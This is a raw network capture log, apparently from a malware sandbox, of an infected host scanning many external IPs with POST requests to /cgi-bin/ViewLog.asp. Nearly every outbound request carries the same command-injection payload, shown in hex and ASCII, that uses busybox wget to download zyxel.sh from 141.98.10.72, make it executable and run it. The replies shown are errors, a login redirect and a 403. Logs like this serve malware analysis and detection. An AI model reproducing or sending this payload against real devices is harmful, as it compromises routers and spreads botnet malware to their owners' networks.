Feb 14, 2024 09:29:16.513189077 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:16.720432043 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Mon, 12 Feb 2024 23:31:15 GMT Content-Type: text/html Content-Length: 3201 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from localhost.localdomain X-Cache-Lookup: NONE from localhost.localdomain:500 Via: 1.0 localhost.localdomain (squid/3.1.23) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ speci

Session ID	Source IP	Source Port	Destination IP	Destination Port
172	192.168.2.15	50174	62.65.35.122	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:16.551403999 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:17.306507111 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:18.778434038 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:21.946528912 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:27.834163904 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.609901905 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:04.441135883 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:51.543762922 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
173	192.168.2.15	33344	85.95.156.201	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:16.776981115 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:17.105657101 CET	274	IN	HTTP/1.0 200 OK Server: httpd/2.0 x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Date: Wed, 14 Feb 2024 08:31:02 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
174	192.168.2.15	33352	85.95.156.201	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:17.447114944 CET	334	IN	HTTP/1.0 400 Bad Request Server: httpd/2.0 x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Date: Wed, 14 Feb 2024 08:31:02 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
175	192.168.2.15	52024	31.33.136.29	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.345046997 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:18.938417912 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:20.122467041 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
176	192.168.2.15	51754	62.103.31.179	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.396085024 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:18.684637070 CET	36	IN	HTTP/1.1 403 Forbidden

Session ID	Source IP	Source Port	Destination IP	Destination Port
177	192.168.2.15	44038	94.122.16.200	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.400614977 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
178	192.168.2.15	51460	62.171.171.114	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.555161953 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
179	192.168.2.15	49736	85.208.21.117	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.615242958 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
180	192.168.2.15	45704	31.136.192.99	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.617885113 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.290477991 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:20.634419918 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:23.482359886 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:28.858175039 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.609872103 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.393328905 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.399975061 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
181	192.168.2.15	32768	31.136.195.220	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.618483067 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.290457010 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
